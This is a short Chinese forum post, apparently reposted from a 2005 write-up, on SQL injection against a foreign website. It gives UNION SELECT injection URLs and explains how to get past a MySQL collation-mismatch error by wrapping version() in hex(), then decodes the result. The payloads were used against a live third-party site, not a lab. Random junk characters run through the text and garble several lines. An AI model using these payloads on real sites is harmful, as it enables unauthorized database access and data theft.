本文作者:SuperHei* Z( S' n' }2 s5 z& O
文章性质:原创
& K6 n! K; x) e发布日期:2005-10-18
; R( Z3 X+ K2 d3 R; z x7 Z1 A/ g测试个国外的站时:
# f: @. x+ M) ]" r! furl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
% p. Q7 X1 l0 j' X) C$ I5 D) I返回错误:
" g' V% t1 M- m$ P& zIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
8 l" g! Z( C) |7 h0 U8 JMySQL Error No. 126
# o7 E( \' j5 s( J" A看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
1 P6 U3 e; L* U0 B% n7 x解决办法:转为其他编码如hex。
z1 r _: O8 F( w f- \url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*9 M z! H* ]4 L' P) A) S, a
成功得到hex(version())的值为:
5 @" q4 D8 a7 p% Q( ]& \. G342E312E332D62657461
) R9 |( M+ I* a9 U/ b回Mysql查询下得到:
- ^, p% ^$ ]3 nmysql> select 0x342E312E332D62657461;! X, P& s% ]. y! h$ n& Q( O4 @
+------------------------+
/ W3 B# s; E# z| 0x342E312E332D62657461 |5 w6 Q: p# f! a% e' a: ]
+------------------------+2 n6 B4 v+ X: d! I
| 4.1.3-beta |2 l' t( i/ v/ ~6 x7 \7 c7 U
+------------------------+
/ ?& }; s7 Y/ r) B" Z: h2 G# i1 row in set (0.00 sec)
0 l1 o8 Q+ w4 C: [6 h* d
/ K/ d% Q% H7 M1 P2 x4 R |
发表于 2012-9-15 14:04:54
收藏
支持
反对